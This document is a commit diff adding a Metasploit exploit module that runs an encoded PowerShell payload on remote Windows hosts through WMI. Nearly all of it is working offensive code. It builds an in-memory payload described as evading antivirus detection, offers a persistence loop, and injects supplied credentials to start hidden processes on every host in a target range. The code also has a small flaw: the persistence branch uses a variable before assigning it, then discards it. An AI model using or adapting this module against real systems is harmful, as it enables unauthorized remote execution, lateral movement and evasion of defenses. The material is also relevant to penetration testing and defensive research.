Land rapid7#6638, add local exploit module to execute payload w/ stealth

wchen-r7 · wchen-r7 · commit c0af5b690d4a · 2016-11-16T16:25:15.000-06:00
diff --git a/modules/exploits/windows/local/ps_wmi_exec.rb b/modules/exploits/windows/local/ps_wmi_exec.rb
@@ -0,0 +1,188 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+require 'msf/core/post/windows/powershell'
+require 'msf/core/post/windows/priv'
+require 'msf/core/exploit/powershell/dot_net'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Windows::Powershell
+  include Msf::Exploit::Powershell::DotNet
+  include Msf::Post::Windows::Priv
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'                 => "Authenticated WMI Exec via Powershell",
+      'Description'          => %q{
+        This module uses WMI execution to launch a payload instance on a remote machine.
+        In order to avoid AV detection, all execution is performed in memory via psh-net
+        encoded payload. Persistence option can be set to keep the payload looping while
+        a handler is present to receive it. By default the module runs as the current
+        process owner. The module can be configured with credentials for the remote host
+        with which to launch the process.
+      },
+      'License'              => MSF_LICENSE,
+      'Author'               => 'RageLtMan <rageltman[at]sempervictus>',
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Payload' => { 'Space' => 8192 },
+      'Platform'      => [ 'windows' ],
+      'SessionTypes'  => [ 'meterpreter' ],
+      'Targets' => [ [ 'Universal', {} ] ],
+      'DefaultTarget' => 0,
+      'DisclosureDate'=> "Aug 19 2012"
+
+    ))
+
+    register_options(
+      [
+        OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
+        OptString.new('USERNAME', [false, "Username to authenticate as"]),
+        OptString.new('PASSWORD', [false, "Password to authenticate with"]),
+        OptString.new('DOMAIN', [false, "Domain or machine name"]),
+
+      ], self.class)
+
+    register_advanced_options(
+      [
+        OptBool.new('PowerShellPersist', [false, 'Run the payload in a loop']),
+        OptBool.new('RunRemoteWow64', [
+          false,
+          'Execute powershell in 32bit compatibility mode, payloads need native arch',
+          false
+        ]),
+
+      ], self.class)
+
+  end
+
+  def build_script
+    run_opts = {}
+    run_opts[:username] = datastore['USERNAME']
+    run_opts[:domain] = datastore['DOMAIN'] || '.'
+    run_opts[:password] = datastore['PASSWORD']
+
+    # End of file marker
+    eof = Rex::Text.rand_text_alpha(8)
+    env_suffix = Rex::Text.rand_text_alpha(8)
+
+    # Create base64 encoded payload
+    psh_payload_raw = Msf::Util::EXE.to_win32pe_psh_reflection(framework, payload.raw)
+    if datastore['PowerShellPersist']
+      fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
+      sleep_time = rand(5)+5
+      psh_payload  = "function #{fun_name}{#{psh_payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
+    end
+    psh_payload = compress_script(psh_payload_raw, eof)
+    # WMI exec function - this is going into powershell.rb after pull 701 is commited
+    script = ps_wmi_exec(run_opts)
+    # Build WMI exec calls to every host into the script to reduce PS instances
+    # Need to address arch compat issue here, check powershell.exe arch, check pay arch
+    # split the hosts into wow64 and native, and run each range separately
+    ps_bin = datastore['RunRemoteWow64'] ? 'cmd /c %windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
+    # for whatever reason, passing %systemroot% instead of 'C:\windows' fails
+
+    if datastore["RHOSTS"]
+      # Iterate through our hosts list adding a call to the WMI wrapper for each.
+      # This should learn to differentiate between hosts and call WOW64 as appropriate,
+      # as well as putting the payload into a variable when many hosts are hit so the
+      # uploaded script is not bloated since each encoded payload is bulky.
+
+      Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |host|
+        if run_opts[:username] and run_opts[:password]
+          script << " New-RemoteProcess -rhost \"#{host}\" -login \"#{run_opts[:domain]}\\#{run_opts[:username]}\""
+          script << " -pass '#{run_opts[:password]}' -cmd \"#{ps_bin} -EncodedCommand #{psh_payload}\";"
+        else
+          script << " New-RemoteProcess -rhost \"#{host}\" -cmd \"#{ps_bin} -EncodedCommand #{psh_payload}\";"
+        end
+      end
+    else
+      print_status('Running Locally')
+      script = psh_payload_raw
+    end
+    return script
+  end
+
+  def exploit
+    # Make sure we meet the requirements before running the script
+    unless have_powershell?
+      fail_with(Failure::BadConfig, 'PowerShell not found')
+    end
+
+
+    # SYSTEM doesnt have credentials on remote hosts
+    if is_system? and datastore['RHOSTS']
+      print_error("Cannot run as local system on remote hosts")
+      return 0
+    end
+
+    script = build_script
+
+    if datastore['Powershell::Post::dry_run']
+      print_good script
+      return
+    end
+
+    begin
+      psh_output = datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script,true,false)
+      print_good(psh_output)
+    rescue Rex::TimeoutError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+    end
+
+    vprint_good('PSH WMI exec is complete.')
+  end
+
+  # Wrapper function for instantiating a WMI win32_process
+  # class object in powershell.
+  # Insantiates the [wmiclass] object and configures the scope
+  # Sets impersonation level and injects credentials as needed
+  # Configures application startup options to hide the newly
+  # created window. Adds start-up check for remote proc.
+  def ps_wmi_exec(opts = {})
+
+    ps_wrapper = <<EOS
+Function New-RemoteProcess {
+    Param([string]$rhost,[string]$cmd,[string]$login,[string]$pass)
+    $ErrorActionPreference="SilentlyContinue"
+  $proc = [WMIClass]"\\\\$rhost\\root\\cimv2:Win32_Process"
+EOS
+  if opts[:username] and opts[:password]
+    ps_wrapper += <<EOS
+  $proc.psbase.Scope.Options.userName = $login
+  $proc.psbase.Scope.Options.Password = $pass
+EOS
+  end
+  ps_wrapper += <<EOS
+  $proc.psbase.Scope.Options.Impersonation = [System.Management.ImpersonationLevel]::Impersonate
+  $proc.psbase.Scope.Options.Authentication = [System.Management.AuthenticationLevel]::PacketPrivacy
+  $startup = [wmiclass]"Win32_ProcessStartup"
+  $startup.Properties['ShowWindow'].value=$False
+  $remote = $proc.Create($cmd,'C:\\',$startup)
+  if ($remote.returnvalue -eq 0) {
+    Write-Host "Successfully launched on $rhost with a process id of" $remote.processid
+  } else {
+    Write-Host "Failed to launch on $rhost. ReturnValue is" $remote.ReturnValue
+  }
+}
+
+EOS
+
+    return ps_wrapper
+  end
+
+end
+
+
+#
+# Ideally the methods to create WMI wrapper functions and their callers
+# should be in /lib/msf/core/post/windows/powershell/ps_wmi.rb.
+#
